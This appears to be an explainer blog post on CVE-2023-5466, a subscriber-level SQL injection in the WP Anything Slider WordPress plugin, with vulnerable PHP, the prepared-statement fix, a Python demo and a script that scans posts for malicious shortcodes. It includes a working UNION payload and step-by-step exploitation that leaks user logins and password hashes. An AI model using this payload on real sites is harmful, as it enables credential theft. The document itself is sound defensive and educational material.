CVE-2023-5466 - SQL Injection Vulnerability in WP Anything Slider Plugin Explained

*WordPress* is the world’s most popular CMS, so an insecure plugin can affect a very large number of sites. In this article we look at CVE-2023-5466, an authenticated SQL Injection bug in the WP Anything Slider plugin (up to and including version 9.1): how it works, how an attacker exploits it, and how you protect a site, in plain language with short code examples.

What is CVE-2023-5466?

CVE-2023-5466 is a SQL Injection vulnerability in the WP Anything Slider plugin for WordPress. Any authenticated user, down to a subscriber account, can inject SQL through the id attribute of the plugin’s shortcode on a vulnerable site. That lets an attacker read data the query was never meant to return, such as usernames, email addresses and password hashes from the wp_users table.

- Vulnerability type: Authenticated (Subscriber+) SQL Injection
- Affected versions: WP Anything Slider up to and including 9.1
- Patch status: Fixed in version 9.2 (as per plugin updates)

References

- Official CVE Page
- Wordfence Advisory
- WPScan Entry

Where’s the Problem?

The main problem lies in how the plugin processes the attributes of its shortcode, for example [wp-anything-slider id="1"]. The id attribute is inserted into an SQL query without type validation and without a prepared statement.

Vulnerable Code Snippet (Simplified)

// Inside the plugin's PHP code (simplified): the id attribute reaches the query unchanged

$id = $_GET['id']; // Or from shortcode attributes: $atts['id']
global $wpdb;
// String interpolation builds the SQL, so whatever text is in $id becomes part of the statement
$query = "SELECT * FROM {$wpdb->prefix}anything_slider WHERE id = $id";
$results = $wpdb->get_results($query); // runs the attacker-shaped query as-is

Notice: The $id variable comes straight from user input and is interpolated into the SQL string. No integer cast, no escaping, no prepared statement, so a value such as 1 UNION SELECT ... is executed as SQL instead of being compared as a number. Dangerous!

What’s SQL Injection?

SQL Injection happens when an attacker supplies SQL syntax where the application expects plain data. If that input is not validated or bound as a query parameter, the database executes it as part of the statement. That lets the attacker do things like reading tables the query was never meant to touch (here: usernames, email addresses and password hashes from wp_users), appending rows from other tables to the legitimate result with UNION, or commenting out the rest of the statement.

Who Can Attack?

Only authenticated users (a registered “subscriber” is enough) can exploit this bug, because the attacker has to get content containing the vulnerable shortcode rendered by the site. Note that a default WordPress subscriber cannot author posts, so in practice the shortcode is delivered through whatever content submission feature the site exposes to low-privilege accounts, such as a front-end submission form.

Exploitation Steps

1. Log in with a low-privilege account (subscriber or higher).
2. Craft the shortcode so that the id attribute carries SQL instead of a number.
3. Post this shortcode using the site’s content submission feature.
4. When the page loads, the plugin runs the injected SQL and displays attacker-controlled results, often leaking sensitive info.

For example, if the attacker wants to leak WordPress usernames and hashed passwords:

[wp-anything-slider id="1 UNION SELECT 1,user_login,user_pass FROM wp_users -- "]

This changes the SQL query to look like:

SELECT * FROM wp_anything_slider WHERE id = 1 UNION SELECT 1,user_login,user_pass FROM wp_users -- 

The UNION part tells MySQL to append rows from the wp_users table (login name and password hash) to the slider data, and the trailing -- turns anything the plugin adds after the id into a comment. The extra rows then appear wherever the plugin prints the fetched columns, visible to the attacker.

Two practical caveats: a UNION only works when both sides return the same number of columns, so the attacker first has to find out how many columns the slider table has (the example assumes three); and wp_ is only the default table prefix, so on a site with a custom prefix the real name of the users table has to be discovered as well.

Visiting the post afterwards is enough. If the site is vulnerable, the slider area will now show login names and password hashes from the wp_users table.

If You Own a Vulnerable Site

- Update the WP Anything Slider plugin to version 9.2 or later. (Download Latest)
- If you write custom plugin code, never interpolate user input into SQL: validate the expected type and bind values with $wpdb->prepare().

A safe way to run the SQL would be:

global $wpdb;
$id = intval($_GET['id']); // Force the value to an integer; "1 UNION ..." becomes 1
// %d in $wpdb->prepare() casts again and binds the value, so no text can alter the query
$query = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}anything_slider WHERE id = %d", $id);
$results = $wpdb->get_results($query);
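To make the mechanics concrete, here is an added example (my own code, not the plugin's) that reproduces both the vulnerable pattern from the UNION walkthrough above and the prepared-statement fix, against an in-memory SQLite database with constructed sample rows. The three-column layout of the slider table, the fake password hashes and the php_intval() emulation are assumptions for the demo; WordPress itself runs on MySQL, where the UNION and the column-count requirement behave the same way.

```python
import re
import sqlite3

# Constructed sample rows for the demo; none of this is real site data.
SLIDER_ROWS = [(1, "homepage", "{}"), (2, "sidebar", "{}")]
USER_ROWS = [(1, "admin", "$P$BfakeHashForDemoOnly"), (2, "editor", "$P$BanotherFakeHash")]

# The payload from the article: the id attribute carries a UNION instead of a number.
PAYLOAD = "1 UNION SELECT 1,user_login,user_pass FROM wp_users -- "
# Same idea with the wrong number of columns (two instead of three).
BAD_COLUMN_PAYLOAD = "1 UNION SELECT user_login,user_pass FROM wp_users -- "


def make_db():
    """In-memory stand-in for the plugin table and wp_users (assumed three-column layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_anything_slider (id INTEGER, name TEXT, config TEXT)")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_anything_slider VALUES (?, ?, ?)", SLIDER_ROWS)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", USER_ROWS)
    return conn


def vulnerable_lookup(conn, slider_id):
    """The plugin's pattern: the attribute text is interpolated straight into the SQL."""
    query = f"SELECT * FROM wp_anything_slider WHERE id = {slider_id}"
    return conn.execute(query).fetchall()


def php_intval(value):
    """Emulates PHP intval(): leading integer digits count, anything after them is dropped."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def fixed_lookup(conn, slider_id):
    """The fix: cast to int, then bind as a parameter (what $wpdb->prepare(..., %d) does)."""
    slider_id = php_intval(slider_id)
    query = "SELECT * FROM wp_anything_slider WHERE id = ?"
    return conn.execute(query, (slider_id,)).fetchall()


def union_succeeds(conn, payload):
    """True if the injected UNION executes; False when the column counts do not line up."""
    try:
        vulnerable_lookup(conn, payload)
        return True
    except sqlite3.OperationalError:
        return False


def leaked_credentials(rows):
    """Pull (login, hash) pairs out of rows that came from wp_users rather than the slider."""
    return sorted((r[1], r[2]) for r in rows if str(r[2]).startswith("$P$"))


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:", vulnerable_lookup(db, "1"))
    print("injected lookup leaks:", leaked_credentials(vulnerable_lookup(db, PAYLOAD)))
    print("UNION with wrong column count works?", union_succeeds(db, BAD_COLUMN_PAYLOAD))
    print("fixed lookup with the same payload:", fixed_lookup(db, PAYLOAD))
```

The vulnerable function returns the slider row plus one row per user, which is exactly what the plugin would render; the mismatched payload fails at parse time, which is why an attacker probes the column count first. The fixed function turns the whole payload into the integer 1 and returns only the slider row.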

Conclusion

CVE-2023-5466 shows how a single unprepared query in a WordPress plugin can expose an entire site. If you use WP Anything Slider, update to version 9.2 or later now and review your content for shortcodes that carry SQL instead of a numeric id. Always validate input and use prepared statements, even for input from authenticated users: on a site with open registration, a subscriber account costs an attacker nothing.
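As a concrete check for the "review your site" advice, here is an added example (my own code, not from the plugin or this article) that scans post content for the plugin's shortcode and flags any occurrence whose id attribute is not a plain integer. The shortcode name wp-anything-slider is taken from the article, the sample posts are constructed; on a real site you would feed it the ID and post_content columns of wp_posts (revisions and custom post types included), for example exported with WP-CLI's wp db query.

```python
import re

# Matches the plugin's shortcode tag (name assumed from the article) and captures its attributes.
SHORTCODE_RE = re.compile(r"\[wp-anything-slider\b([^\]]*)\]", re.IGNORECASE)
# Matches the id attribute in double quotes, single quotes, or bare.
ID_ATTR_RE = re.compile(r"""\bid\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""", re.IGNORECASE)
# A legitimate slider id is a plain integer; anything else deserves a look.
NUMERIC_RE = re.compile(r"^\d+$")

# Constructed sample rows standing in for (ID, post_content) from wp_posts.
SAMPLE_POSTS = [
    (10, 'Welcome! [wp-anything-slider id="1"] enjoy the gallery'),
    (11, '[wp-anything-slider id="1 UNION SELECT 1,user_login,user_pass FROM wp_users -- "]'),
    (12, "Two sliders: [wp-anything-slider id='2'] and [wp-anything-slider id='2 OR 1=1']"),
    (13, "No shortcode here at all."),
]


def extract_ids(content):
    """Return every id attribute value found in the plugin's shortcodes within content."""
    ids = []
    for m in SHORTCODE_RE.finditer(content):
        attrs = m.group(1)
        a = ID_ATTR_RE.search(attrs)
        if a:
            # Only one of the three capture groups is set, depending on the quoting style.
            ids.append(next(g for g in a.groups() if g is not None))
    return ids


def find_suspicious(posts):
    """Return (post_id, attribute_value) pairs for shortcodes whose id is not a plain integer."""
    findings = []
    for post_id, content in posts:
        for value in extract_ids(content):
            if not NUMERIC_RE.match(value.strip()):
                findings.append((post_id, value))
    return findings


if __name__ == "__main__":
    for post_id, value in find_suspicious(SAMPLE_POSTS):
        print(f"post {post_id}: suspicious id attribute {value!r}")
```

A hit is not proof of a successful attack, only that someone stored SQL in the attribute; treat the author account and the post's creation time as the starting point of the investigation, and rotate credentials if the site was running 9.1 or older when the content was published.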

More References

- WP Anything Slider Plugin Directory
- SQL Injection Guide for Beginners (OWASP)

Timeline

Published on: 11/22/2023 16:15:12 UTC
Last modified on: 11/28/2023 19:29:09 UTC